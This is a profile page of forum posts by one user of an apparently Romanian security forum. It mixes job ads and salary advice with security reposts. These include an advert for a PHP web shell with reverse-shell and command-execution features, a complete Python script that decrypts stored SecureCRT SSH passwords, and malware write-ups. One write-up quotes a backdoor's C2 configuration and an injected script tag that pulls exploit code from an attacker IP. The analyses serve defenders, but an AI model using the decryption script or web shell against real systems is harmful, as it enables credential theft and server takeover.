
Nytro

Administrators
Everything posted by Nytro

  1. CCCP Shell

CCCPShell is a PHP shell written from scratch in my spare time. You will find in this shell:
- Pure JavaScript (sessionStorage, serialize, AJAX, append, remove, empty, change sort table order, and modal dialogs)
- PHP zip with PHP code
- Full DB explorer (MySQL, MSSQL, PostgreSQL, Oracle, SQLite, SQLite3, ODBC and PDO)
- 21 icons used across 94 file types
- CSS3
- Easy to translate to another language via the tText function (WIP)
- All the standard shell stuff
- Encrypted communication (first PHP shell in the world???)

All tools:

Filemanager
[+] Copy/paste (recursive)
[+] In-memory compress and download (recursive)
[+] Delete (recursive)
[+] Create file/folder
[+] Fast view of folder size/object count
[+] Fast file rename
[+] Fast chmod
[+] Fast change of file date
[!] View file information
    [+] Full path
    [+] Size
    [+] MD5
    [+] Chmod/Chown
    [+] Create time
    [+] Access time
    [+] Modify time
    [+] Hexdump preview/full
    [+] Highlighted code
    [+] File content
[!] Edit
    [+] Change file time
    [+] File name
    [+] Change content

Procs
[+] Process viewer/info
[+] Process killer

SQL
[+] Database explorer
[+] Execute SQL code

Info
[+] Server info
[+] PHP info
[+] Custom function checks

External Connect
[+] Back connect
[+] Bind shell

Execute
[+] Eval PHP code
[+] Execute (exec, shell_exec, system, passthru, popen and proc_open)

Self remove

WARNING: This shell uses the atob and btoa JavaScript functions. Check whether your browser supports them: https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob

Source: https://github.com/xchwarze/CCCPShell
Via: TrojanForge
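The atob/btoa requirement just means the shell's client-side traffic is base64-wrapped before any further processing. A minimal Python sketch of the same round trip (function names are mine, mirroring the JavaScript built-ins, not taken from CCCPShell's code):

```python
import base64

def btoa(s):
    # JavaScript btoa: latin-1 string -> base64 text
    return base64.b64encode(s.encode("latin-1")).decode("ascii")

def atob(b64):
    # JavaScript atob: base64 text -> original string
    return base64.b64decode(b64).decode("latin-1")

wrapped = btoa('{"cmd": "ls -la"}')
assert atob(wrapped) == '{"cmd": "ls -la"}'
```

Note that base64 on its own is an encoding, not encryption; the "encrypted communication" claim would have to rest on whatever additional scheme the shell layers on top.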
  2. For a new project involving desktop application development on Mac and Windows, our client is looking for a C++ Programmer with experience in the Qt framework, who will be part of a team of 5 people. The position is open both in Bucharest and at the Iasi office. Anyone interested, send me a PM.
  3. I'll send you more information about the Embedded Software Developer opportunity for the Bucharest location, for one of our projects active in the automotive field. PM me if interested.
  4. Isn't this the guy who said he makes 140 million a month? Is he in Amsterdam by any chance, having pulled some shady stuff?
  5. Give us more details. What exactly do you do there? What languages do you know? Which language do you work in the most? Who gave you 40 million initially? Who is paying you 140 million? Is this in Romania? How old are you? How many years of experience do you have? Do you have connections in the public sector? Is that what you take home, i.e. your net salary?
  6. Awesome! I made $10 in just 2 weeks! BRB, buying TWO packs of cigarettes!
  7. Guys. Who the hell do you think is going to jump at you with money? You haven't written 200 lines of code in your lives and you expect a salary of 50 million. Fools. At the start nobody will give you more than 1500-2000, regardless of the language. Especially when you show up with a CV that says "Wow, I know 42 programming languages" and nothing else. Projects you've worked on? None. All languages pay off. In any language you can earn up to 2000-2500 euros a month. But that's once you become a Team Leader, a Manager, or hold some other leadership position. In the meantime, you start at 1500 RON (you don't even deserve that) and grow gradually. Let's say: 1500 RON for roughly 6 months to a year. Then you get to 20-something million, then 30 million. And only after at least 2 years of experience should you have the decency to ask for more than that. You can grow faster, too; it depends on the company you end up at and how good you are. Stop listening to people who claim they earn 80 million a month. It's achievable, but after many years of work. That guy may have worked 5 years to reach that salary; you wasted 5 years doing nothing, and then you go to interviews wondering why they show you the door the moment salary comes up. As for the programming language, the choice is simple: pick what you like. You will always be good at what you enjoy doing. Just as you're good at playing lousy games, you'll be good at C++ if that's what you enjoy. But before you even think about getting hired, write your CV and imagine you own a company and a kid walks in with that exact CV to discuss salary. That's how you'll figure out what you're worth. Note: If you're an olympiad winner or genuinely good at something, you can earn more from the start. Say you get 40 million a month from day one. But that comes bundled with other downsides: 1. You will NOT see a raise. 2. You are NOT allowed to leave that company for 2 years. It's just one case, more or less real.

If a company offers you a big salary, rest assured something is off, and read the contract before signing it. @2time - What was your first salary? @gogusan - Did they really pay you that much as a first salary for Java? We're talking about first salaries here. Stop coming here with numbers like these and giving the kids illusions. Note: A relative of mine earns 1500 RON a month as a cleaning lady. Programming isn't what it was a few years ago. There are THOUSANDS of people, THOUSANDS, graduating from relevant faculties (if you didn't attend the University or the Polytechnic in Bucharest, nobody even looks at your Spiru Haret CV). Granted, most of them are useless, learn nothing, and just expect billions because they finished some worthless faculty. But what matters to the employer is that one of these guys shows up asking for 3 million a month less. So: 1. Work on projects. Drop the slacking, the TV shows and the games. Work! Build yourself a CV, so you have something to show when you ask someone for a pile of money. 2. Go to a good university. Not bloody Spiru Haret or the like. It matters more than you think. 3. Learn! At university or at home, learn, because interviews include technical questions, and they can last as long as 3-4 hours. Stop listening to all the fools posting here who are 15 and live off their parents' money.
  8. Decrypt SSHv2 passwords stored in VanDyke SecureCRT

#!/usr/bin/env python
#
# Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files
# Can be found on Windows in:
# %APPDATA%\VanDyke\Config\Sessions\sessionname.ini
# Tested with version 7.2.6 (build 606) for Windows
# Eloi Vanderbeken - Synacktiv

from Crypto.Cipher import Blowfish
import argparse
import re

def decrypt(password):
    # Passwords are double-Blowfish-encrypted with two fixed keys
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ', '').decode('hex'), Blowfish.MODE_CBC, '\x00' * 8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ', '').decode('hex'), Blowfish.MODE_CBC, '\x00' * 8)
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    p = ''
    while padded[:2] != '\x00\x00':
        p += padded[:2]
        padded = padded[2:]
    return p.decode('UTF-16')

REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
REGEX_PASSWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

def hostname(x):
    m = REGEX_HOSTNAME.search(x)
    if m:
        return m.group(1)
    return '???'

def password(x):
    m = REGEX_PASSWORD.search(x)
    if m:
        return decrypt(m.group(1))
    return '???'

def port(x):
    m = REGEX_PORT.search(x)
    if m:
        return '-p %d ' % (int(m.group(1), 16))
    return ''

def username(x):
    m = REGEX_USERNAME.search(x)
    if m:
        return m.group(1) + '@'
    return ''

parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke SecureCRT session files')
parser.add_argument('files', type=argparse.FileType('r'), nargs='+', help='session file(s)')
args = parser.parse_args()
for f in args.files:
    c = f.read().replace('\x00', '')
    print f.name
    print "ssh %s%s%s # %s" % (port(c), username(c), hostname(c), password(c))
  9. Use it from a virtual machine. And it IS a keylogger.
  10. Zeroing buffers is insufficient On Thursday I wrote about the problem of zeroing buffers in an attempt to ensure that sensitive data (e.g., cryptographic keys) which is no longer wanted will not be left behind. I thought I had found a method which was guaranteed to work even with the most vexatiously optimizing C99 compiler, but it turns out that even that method wasn't guaranteed to work. That said, with a combination of tricks, it is certainly possible to make most optimizing compilers zero buffers, simply because they're not smart enough to figure out that they're not required to do so — and some day, when C11 compilers become widespread, the memset_s function will make this easy. There's just one catch: We've been solving the wrong problem. With a bit of care and a cooperative compiler, we can zero a buffer — but that's not what we need. What we need to do is zero every location where sensitive data might be stored. Remember, the whole reason we had sensitive information in memory in the first place was so that we could use it; and that usage almost certainly resulted in sensitive data being copied onto the stack and into registers. Now, some parts of the stack are easy to zero (assuming a cooperative compiler): The parts which contain objects which we have declared explicitly. Sensitive data may be stored in other places on the stack, however: Compilers are free to make copies of data, rearranging it for faster access. One of the worst culprits in this regard is GCC: Because its register allocator does not apply any backpressure to the common subexpression elimination routines, GCC can decide to load values from memory into "registers", only to end up spilling those values onto the stack when it discovers that it does not have enough physical registers (this is one of the reasons why gcc -O3 sometimes produces slower code than gcc -O2). 
Even without register allocation bugs, however, all compilers will store temporary values on the stack from time to time, and there is no legal way to sanitize these from within C. (I know that at least one developer, when confronted by this problem, decided to sanitize his stack by zeroing until he triggered a page fault — but that is an extreme solution, and is both non-portable and very clear C "undefined behaviour".) One might expect that the situation with sensitive data left behind in registers is less problematic, since registers are liable to be reused more quickly; but in fact this can be even worse. Consider the "XMM" registers on the x86 architecture: They will only be used by the SSE family of instructions, which is not widely used in most applications — so once a value is stored in one of those registers, it may remain there for a long time. One of the rare instances those registers are used by cryptographic code, however, is for AES computations, using the "AESNI" instruction set. It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. For encryption operations these aren't catastrophic things to leak — the final block of output is ciphertext, and the final AES round key, while theoretically dangerous, is not enough on its own to permit an attack on AES — but the situation is very different for decryption operations: The final block of output is plaintext, and the final AES round key is the AES key itself (or the first 128 bits of the key for AES-192 and AES-256). I am absolutely certain that there is software out there which inadvertently keeps an AES key sitting in an XMM register long after it has been wiped from memory. 
As with "anonymous" temporary space allocated on the stack, there is no way to sanitize the complete CPU register set from within portable C code — which should probably come as no surprise, since C, being designed to be a portable language, is deliberately agnostic about the registers and even the instruction set of the target machine. Let me say that again: It is impossible to safely implement any cryptosystem providing forward secrecy in C. If compiler authors care about security, we need a new C language extension. After discussions with developers — of both cryptographic code and compilers — over the past couple of years I propose that a function attribute be added with the following meaning: "This function handles sensitive information, and the compiler must ensure that upon return all system state which has been used implicitly by the function has been sanitized." While I am not a compiler developer, I don't think this is an entirely unreasonable feature request: Ensuring that registers are sanitized can be done via existing support for calling conventions by declaring that every register is callee-save, and sanitizing the stack should be easy given that the compiler knows precisely how much space it has allocated. With such a feature added to the C language, it will finally be possible — in combination with memset_s from C11 — to write code which obtains cryptographic keys, uses them without leaking them into other parts of the system state, and then wipes them from memory so that a future system compromise can't reveal the keys. People talk a lot about forward secrecy; it's time to do something about it. But until we get that language extension, all we can do is hope that we're lucky and our leaked state gets overwritten before it's too late. That, and perhaps avoid using AESNI instructions for AES-128 decryptions. Source: Zeroing buffers is insufficient
  11. JSPwn - JavaScript Static Code Analysis

Copyright: Duarte Monteiro (etraud123) - JSPwn; Nishant Das Patnaik (nishant.dp@) - JSPrime; Paul Theriault (pauljt) - ScanJS

JSPwn is a modified version of ScanJS + JSPrime. The tool lets developers detect the sinks and sources of their applications and find XSS vulnerabilities and DOM XSS (beta). By combining the ScanJS vulnerability-detection engine with the code-flow feature of JSPrime, the app can both detect vulnerable points and backtrack through the code.

Example:
- Open the app: node server.js
- Go to: http://localhost:4000/client/#/scan
- Select a file from a folder
- Enable REGEXP Custom

Link: https://github.com/Etraud123/JSpwn
  12. Nuclear Exploit Kit and Flash CVE-2014-0515

For this blog, we'd like to walk you through a recent attack involving Nuclear Exploit Kit (EK) that we analyzed. It was found leveraging CVE-2014-0515, a buffer overflow in Adobe Flash Player discovered in April 2014. Nuclear Exploit Kit targets a number of known vulnerabilities, including:
- pdf - PDF:Exploit.PDF-JS
- swf - CVE-2014-0515
- jar - CVE-2012-0507

Below are the files which were downloaded during the exploitation attempts observed:

FILE TYPE | MD5                              | SIZE   | CVE/THREAT     | VT HITS
FLASH     | A1465ECE32FA3106AA88FD666EBF8C78 | 5614   | CVE-2014-0515  | 18 / 53
JAR       | A93F603A95282B80D8AFD3F23C4D4889 | 12396  | CVE-2012-0507  | 26 / 54
PDF       | 19ED55EF17A49451D8052D0B51C66239 | 9770   | Exploit.PDF-JS | 22 / 54
EXE       | 8BCE8A59F9E789BEFB9D178C9A03FB66 | 104960 | Win32/Zemot    | 39 / 53

Although there are other associated vulnerabilities being exploited by Nuclear Exploit Kit, we will limit this blog post to reviewing the Flash exploitation (CVE-2014-0515).

Nuclear EK Landing

Unlike other EKs such as RIG, Nuclear EK's landing page code is highly obfuscated. (Fig 1: Obfuscated Landing Page) After de-obfuscation, the page looks as follows: (Fig 2: De-Obfuscated Landing Page) Nuclear EK's landing page checks for the following antivirus (AV) driver files and, if it finds any, terminates the exploitation process. We have seen these checks before in RIG EK too. (Fig 3: Check for AV driver files) If this AV check is passed, a JavaScript function then checks the installed Flash version, and if a vulnerable version is detected in the client's browser, a call is made to a dynamic Flash object creation module. 
(Fig 4: Flash Call) Here are the vulnerable Flash Player checks: (Fig 5: Checks if vulnerable version installed) If the version check passes, the Flash exploitation process will commence as seen below.

CVE-2014-0515 exploit analysis

Here is the code that dynamically creates a new Flash object: (Fig 6: Flash Object Creation) The Flash exploit payload that gets downloaded is highly obfuscated to evade AV detection. Below is a snippet of decompiled code from this Flash exploit: (Fig 7: Decompiled Flash File) There are two hard-coded snippets of obfuscated shellcode in the ActionScript, as seen below: (Fig x1, x2: Raw Shellcodes) After de-obfuscating them at run time, it adds bytecode to a Shader object from one of the de-obfuscated shellcode snippets. (Fig 8: Shader Byte Code Filler) The Shader's Pixel Bender is where this malformed bytecode is written, which triggers the vulnerability. Here is the malformed bytecode: (Fig 9: Malformed data for Pixel Shader)

Disassembling Pixel Bender's bytecode

We used Tinic Uro's program to decompile the Pixel Bender binary data. (Fig 10: Decompiled PixelBender data) We can see the inappropriate content here: the Shader object takes a float parameter whose default value is set to a 4x4 matrix of floats, and the second float value of this matrix is an invalid value that triggers the vulnerability.

Conclusion

Since the downfall of the popular Blackhole Exploit Kit, we have seen the advent of many new exploit kits. Nuclear Exploit Kit definitely ranks among the top 5 prevalent EKs in the wild at the moment. We have seen an increasing number of compromised sites and scam pages leading to Nuclear Exploit Kit in the past three months. Some of the notable compromised sites during this time frame that were redirecting to Nuclear EK include: SocialBlade.com - a YouTube statistics tracking site; 
AskMen.com - a men's entertainment website; Facebook.com survey scam pages. Exploit kits generally make use of known vulnerabilities, and Flash is a popular target. CVE-2014-0515 in particular targets a Flash vulnerability in Flash versions before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux. It's critical to ensure that your employees aren't running outdated versions of Flash, as it is commonly targeted by EKs.

References:
- Adobe ActionScript® 3 (AS3) API Reference
- http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf
- kaourantin.net: Pixel Bender .pbj files
- JPEXS Free Flash Decompiler - Download
- Malware-Traffic-Analysis.net

- Rubin Azad

Source: Zscaler Research: Nuclear Exploit Kit and Flash CVE-2014-0515
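The landing page's version gate described above boils down to comparing the detected Flash version against the patched builds. A rough Python sketch of that comparison logic (function names are mine; the vulnerable ranges are the Windows/OS X ranges quoted in this post):

```python
def version_tuple(v):
    """'13.0.0.182' -> (13, 0, 0, 182), so tuples compare numerically."""
    return tuple(int(x) for x in v.split("."))

def is_vulnerable_windows(v):
    """CVE-2014-0515 on Windows/OS X: everything before 11.7.700.279 is
    vulnerable, as is the 11.8.x-13.0.x line before the 13.0.0.206 fix."""
    t = version_tuple(v)
    if t < version_tuple("11.7.700.279"):
        return True
    if version_tuple("11.8.0.0") <= t < version_tuple("13.0.0.206"):
        return True
    return False

assert is_vulnerable_windows("13.0.0.182")
assert not is_vulnerable_windows("13.0.0.206")
```

An EK landing page does the same comparison in JavaScript against the version reported by the Flash plugin, which is why keeping Flash current was the primary mitigation.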
  13. Forced to Adapt: XSLCmd Backdoor Now on OS X September 4, 2014 | By James T. Bennett and Mike Scott Introduction FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems. This backdoor shares a significant portion of its code with the Windows-based version of the XSLCmd backdoor that has been around since at least 2009. This discovery, along with other industry findings, is a clear indicator that APT threat actors are shifting their eyes to OS X as it becomes an increasingly popular computing platform. Across the global threat landscape, there has been a clear history of leveraging (or porting) Windows malware to the Apple OS X platform. In 2012, AlienVault discovered a document file exploiting an older vulnerability in Microsoft Word that installs a backdoor named “MacControl” on OS X systems. The group responsible for those attacks had been targeting Tibetan non-government organizations (NGOs). It was later discovered that the code for this backdoor was borrowed from an existing Windows backdoor, whose source code can be found on several Chinese programming forums. In 2013, Kaspersky reported on a threat actor group they named “IceFog” that had been attacking a large number of entities related to military, mass media, and technology in South Korea and Japan. This group developed their own backdoor for both Windows and OS X. And just this year, Kaspersky published a report on a group they named “Careto/Mask” that utilized an open source netcat-like project designed to run on *nix and Windows systems named ‘sbd’ which they wrapped in a custom built installer for OS X. Based on our historical intelligence, we believe the XSLCmd backdoor is used by APT, including a group that we call “GREF.” We track this threat group as “GREF” due to their propensity to use a variety of Google references in their activities – some of which will be outlined later in this report. 
Our tracking of GREF dates back to at least the 2009 timeframe, but we believe they were active prior to this time as well. Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGOs, especially those with interests in Asia. XSLCmd for OS X Analysis The XSLCmd backdoor for OS X was submitted to VirusTotal (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1) on August 10, 2014, with 0 detections at the time of submission. The sample is a universal Mach-O executable file supporting the PowerPC, x86, and x86-64 CPU architectures. The code within contains both an installation routine that is carried out the first time it is executed on a system, and the backdoor routine which is carried out after confirming that its parent process is launchd (the initial user mode process of OS X that is responsible for, amongst other things, launching daemons). The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process. Its capabilities include a reverse shell, file listings and transfers, installation of additional executables, and an updatable configuration. The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing. Installation Routine To install, XSLCmd first determines the endianness of the CPU using NXGetLocalArchInfo and whether or not it is running as the super user by comparing the return value of getuid() with 0. The code includes functions to handle endianness differences when dealing with file and network data on a system using big endian, namely older Apple computers that shipped with PowerPC CPUs. 
The process copies its Mach-O from its current location to $HOME/Library/LaunchAgents/clipboardd and creates a plist file in the same directory with the name com.apple.service.clipboardd.plist. The latter file ensures that the backdoor is launched after the system is rebooted once the user logs in. After this is done, the malware relaunches itself using the ‘load’ option of the launchctl utility, which runs the malware according to its configuration in the plist file it created, with launchd as its parent process. This is the process that begins the actual backdoor routine of waiting for and executing commands issued from the C2 server. After running itself with launchctl, the initial process forks and deletes the Mach-O from the original location from which it was executed. The installation routine differs slightly depending on whether or not the process is running with super user privileges. If run as super user, it copies itself to /Library/Logs/clipboardd. Interestingly, if run as super user, the process will also copy /bin/ksh to /bin/ssh. /bin/ksh is the Korn shell executable, and if the user sends a command to initialize a reverse shell, it will use the copy of ksh to do so instead of /bin/bash. This is likely done to make it less obvious that a reverse shell is running on the system, since it may raise less suspicion to see an ssh process opening a network socket rather than a bash process, although the real ssh executable is actually located in /usr/bin/ssh, not /bin/ssh. A list of possible files created by XSLCmd is included in Appendix 1 at the end of this blog. Configuration Options XSLCmd ships with an encrypted configuration file that it defaults to if there is no configuration file written to disk. It will only write its configuration file to disk if it’s updated by the user. It runs in a loop, checking for a configuration update, and then checking for commands. 
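The install paths above make useful host indicators. A small sketch of checking a system for them (the paths are the ones named in the post; the checker itself and its name are mine):

```python
import os

# Paths named in the analysis: per-user install, root install,
# and the suspicious /bin/ssh copy of ksh.
XSLCMD_IOCS = [
    os.path.expanduser("~/Library/LaunchAgents/clipboardd"),
    os.path.expanduser("~/Library/LaunchAgents/com.apple.service.clipboardd.plist"),
    "/Library/Logs/clipboardd",
    "/bin/ssh",  # the real ssh lives in /usr/bin/ssh; /bin/ssh is the ksh copy
]

def check_iocs(paths, exists=os.path.exists):
    """Return the subset of indicator paths present on this host."""
    return [p for p in paths if exists(p)]

hits = check_iocs(XSLCMD_IOCS)
```

Passing a custom `exists` predicate makes the check testable offline; in practice you would also verify the file hashes rather than rely on paths alone.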
If a new configuration is available, it will be written to disk in base64 encoding at $HOME/.fontset/pxupdate.ini. Below is the configuration data stored in the XSLCmd sample we obtained.

[ListenMode] 0
[MServer] 61.128.110.38:8000
[BServer] 61.128.110.38
[Day] 1,2,3,4,5,6,7
[Start Time] 00:00:00
[End Time] 23:59:00
[Interval] 60
[MWeb] http://1234/config.htm
[BWeb] http://1234/config.htm
[MWebTrans] 0
[BWebTrans] 0
[FakeDomain] www.appleupdate.biz
[Proxy] 0
[Connect] 1
[Update] 0
[UpdateWeb] not use

[MServer] and [BServer] specify the main and backup C2 server addresses, which can be either an IP address or a domain name. Only [MServer] needs to specify a port. [Day] specifies which days of the week the malware will poll for commands and configuration updates, where Monday is 1. [Start Time] specifies the local time of day to begin polling. [End Time] specifies the local time of day to stop polling. [Interval] specifies the number of seconds between polls. [MWeb] and [BWeb] specify the main and backup URLs to poll for configuration updates, respectively. Update checks are not performed if these values are left at their default: http://1234/config.htm. Other options will be explained where appropriate later in the blog.

C2 Protocol

XSLCmd uses pseudo-HTTP for its protocol. It opens a socket and uses a string template to set up the HTTP request or response headers, depending on whether or not it was configured for [ListenMode]. If [ListenMode] is set to 1, it listens on its socket, waiting for a connection to which it replies with HTTP response headers following this template:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Server: Apache/2.0.54 (Unix)
Content-Encoding: gzip
Content-Length: %d

The body after the headers, regardless of mode, will contain data specific to the purpose of the communication. 
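Once base64-decoded, the configuration is a simple "[Key] value" line format. A hedged sketch of parsing it (the parser and its name are mine; the sample keys are taken from the dump above):

```python
import re

CONFIG_SAMPLE = """\
[ListenMode] 0
[MServer] 61.128.110.38:8000
[Interval] 60
[FakeDomain] www.appleupdate.biz
"""

def parse_config(text):
    """Parse '[Key] value' lines into a dict of strings."""
    cfg = {}
    for m in re.finditer(r'^\[([^\]]+)\]\s*(.*)$', text, re.MULTILINE):
        cfg[m.group(1)] = m.group(2).strip()
    return cfg

cfg = parse_config(CONFIG_SAMPLE)
assert cfg["MServer"] == "61.128.110.38:8000"
assert int(cfg["Interval"]) == 60
```

A parser like this is handy when triaging a live infection: decode pxupdate.ini and read off the C2 address and polling schedule directly.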
The data is encrypted with a scheme lifted from a game server engine written by a group named "My Destiny Team." The request headers have an interesting feature where the Host and Referer header values have their domain portion populated with the value stored in [FakeDomain]. This value can be any string and has no effect on the network connection established. The value of the 's' argument in the request URL is randomly generated, and all of the other request header values except for Content-Length are hard-coded. Another interesting feature exists for the configuration update function. If [MWebTrans]/[BWebTrans] is set to 1, the configuration update URL request will be proxied through Yahoo's Babelfish service, falling back to the Google Translate service if that fails. As you can see, the 'trurl' parameter in the URL will be set to whatever is configured for [MWeb]/[BWeb]. The User-Agent header for this request is hard-coded and contains the computer name in the parentheses at the end. SSL certificate strings were noticed during our analysis, but with no direct cross-reference to the certificate data. However, there was a cross-reference to the data directly preceding it. This data began with what looked like SSL handshake headers, so we extracted the data from the executable, wrapped it in a PCAP file, and opened it in Wireshark. Interestingly, the data contains everything needed for the server-side packets of an SSL handshake. The SSL certificate being used was for login.live.com and had expired on 6/16/2010. The code using this data opens a socket, waits for a connection, and proceeds to carry out an SSL handshake with the client, throwing away whatever data it receives. This code is not directly referenced by any other code in the executable but could very well replace the [ListenMode] code. Perhaps it is an old feature no longer in use, a new feature yet to be fully implemented, or an optional feature only used in certain cases. 
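The pseudo-HTTP response described above is just a format string with the body length substituted in, dressed up to look like an Apache server. A minimal sketch of assembling such a response (the template text is the one quoted in the post; the helper function is mine):

```python
# Header template as quoted in the analysis; only Content-Length varies.
RESPONSE_TEMPLATE = (
    "HTTP/1.1 200 OK\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Server: Apache/2.0.54 (Unix)\r\n"
    "Content-Encoding: gzip\r\n"
    "Content-Length: %d\r\n"
    "\r\n"
)

def build_response(body):
    """Fill in Content-Length and append the (encrypted) body bytes."""
    return (RESPONSE_TEMPLATE % len(body)).encode("ascii") + body

resp = build_response(b"\x01\x02\x03")
assert b"Content-Length: 3" in resp
```

Note the mismatch that makes this traffic detectable: the headers advertise gzip content encoding, but the body is the malware's custom-encrypted blob, not gzip data.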
Observations We noticed a mix of manually constructed and plain referenced strings throughout the code, sometimes side-by-side in the same function even. This gives the impression of someone working with someone else’s code, adding his own touch and style here and there as he goes. Also of note is that XSLCmd will not perform key logging if run as super user. This can be a problem, because the API used to perform the key logging, CGEventTapCreate, when invoked with the parameters it uses, requires root permissions from the calling process or the “Assistive Devices” feature must be enabled for the application. During the initial installation, there is a routine to programmatically enable assistive devices that will be executed if the OS X version is not 10.8. In 10.9, enabling assistive devices permissions is done on a per application basis with no direct API to achieve this. It is interesting to note that the version check does not account for versions above 10.8, indicating that perhaps 10.8 was the latest version at the time the code was written, or at least the most common. Further supporting this inference is the lack of testing performed on 10.9. This variant uses an API from the private Admin framework that is no longer exported in 10.9, causing it to crash. The effort to support PowerPC with the endian conversion functions is worth mentioning. Coupling this observation with the aforementioned fact that elsewhere in the code, the version of OS X is compared with 10.8, one could deduce that efforts were made to be backwards compatible with older OS X systems. For some frame of reference, Apple’s first OS to drop support for PowerPC was OS X 10.6 released in 2009, and OS X 10.9 was released in October of 2013. Threat Actor Intelligence Historical Background While GREF’s targeting interests overlap with many of the other threat groups we track, their TTP’s are somewhat unique. 
GREF is one of the few APT threat groups that does not rely on phishing as their primary attack method. While they have been known to utilize phishing emails, including malicious attachments and links to exploit sites, they were one of the early adopters of strategic web compromise (SWC) attacks. GREF was especially busy in the 2010 timeframe, during which they had early access to a number of 0-day exploits, including CVE-2010-0806 (IE 6-7 Peer Objects vulnerability), CVE-2010-1297 (Adobe Flash), and CVE-2010-2884 (Adobe Flash), that they leveraged in both phishing and SWC attacks. Many of their SWC attacks we saw in this time period were hosted on defense industry-related sites, including the Center for Defense Information (cdi.org), National Defense Industrial Association (ndia.org), Interservice/Industry Training, Simulation and Education Conference (iitsec.org), and satellite company Millennium Space Systems (millennium-space.com). Most of those attacks involved embedding links to exploit code in the homepage of the affected website, and true to their moniker, the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did.

Figure 1: Sample "google" exploit link

<!-- Google Tracking Code -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://");
document.write(unescape("%3Cscript src='" + gaJsHost + "180.149.252.181/wiki/tiwiki.ashx' type='text/javascript'%3E%3C/script%3E"));
</script>

The TTP that most differentiates GREF from other APT threat groups is their unrelenting targeting of web server vulnerabilities, both to gain entry to targeted organizations and to get new platforms for SWC attacks. 
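Injections like the one in Figure 1 can be flagged mechanically: a legitimate Google Analytics block builds its script URL from google-analytics.com, so any other host concatenated onto gaJsHost inside the block is suspect. A rough Python sketch (the function and its regex are mine, tuned to this one sample pattern):

```python
import re

def suspicious_ga_hosts(html):
    """Flag script hosts concatenated onto gaJsHost that are not
    google-analytics.com (the only host a genuine GA block uses)."""
    hits = []
    for host_path in re.findall(r'gaJsHost \+ "([^"]+)"', html):
        host = host_path.split('/')[0]
        if not host.endswith('google-analytics.com'):
            hits.append(host)
    return hits

INJECTED = (
    "document.write(unescape(\"%3Cscript src='\" + gaJsHost + "
    "\"180.149.252.181/wiki/tiwiki.ashx' type='text/javascript'"
    "%3E%3C/script%3E\"));"
)
assert suspicious_ga_hosts(INJECTED) == ["180.149.252.181"]
```

A production scanner would parse the JavaScript properly rather than regex it, but the principle (whitelist the expected analytics host, alert on anything else) carries over.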
This threat group appears to devote more resources than most other groups to attempting to penetrate web servers, and they generally make no attempt to obscure the attacks, often generating gigabytes of traffic in long-running attacks. They are known to utilize open-source tools such as SQLMap to perform SQL injection, but their most obvious tool of choice is the web vulnerability scanner Acunetix, which leaves tell-tale request patterns in web server logs. They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system.

Another historical TTP attributed to GREF was their frequent re-use of specific IP ranges, both to perform reconnaissance and launch their attacks and for command and control and exfiltration of data. In the early years, we documented them routinely using IP addresses in the 210.211.31.x (China Virtual Telecom - Hong Kong), 180.149.252.x (Asia Datacenter - Hong Kong), and 120.50.47.x (Qala - Singapore) ranges. In addition, their reconnaissance activities frequently included referrer headers from google.com and google.com.hk with search features such as "inurl" and "filetype" looking for specific systems, technologies, and known vulnerabilities.

C2 Domains

GREF is known to have sometimes configured their malware with bare IP addresses rather than domains, but there are some clusters of domain registrants that we attribute to them.
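The tell-tale scanner patterns mentioned above can be hunted for in web server logs. Below is a minimal sketch; the indicator substrings are illustrative assumptions based on commonly documented Acunetix and SQLMap fingerprints, not strings recovered from GREF traffic:

```python
# Sketch: flag web-server log lines that look like automated scanner traffic.
# The marker substrings are assumptions based on publicly documented
# Acunetix/SQLMap fingerprints, not GREF-specific indicators.
SCANNER_MARKERS = [
    "acunetix",                    # Acunetix embeds its name in many test payloads
    "acunetix_wvs_security_test",  # classic Acunetix probe string
    "sqlmap",                      # default SQLMap User-Agent contains "sqlmap"
]

def suspicious_lines(log_lines):
    """Return (line_number, line) pairs that contain a scanner marker."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        lowered = line.lower()
        if any(marker in lowered for marker in SCANNER_MARKERS):
            hits.append((n, line))
    return hits

if __name__ == "__main__":
    sample = [
        '1.2.3.4 - - "GET /index.php?id=1 HTTP/1.1" 200 512',
        '5.6.7.8 - - "GET /wiki/?q=acunetix_wvs_security_test HTTP/1.1" 404 0',
    ]
    for n, line in suspicious_lines(sample):
        print(n, line)
```

In practice the marker list would be tuned against the log format at hand; the point is only that these scanners are noisy and leave grep-able traces.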
Table 1: GREF domain registrations

Domain                          Registrant Email Address
allshell[.]net                  cooweb51[@]hotmail.com
attoo1s[.]com                   cooweb51[@]hotmail.com
kasparsky[.]net                 cooweb51[@]hotmail.com
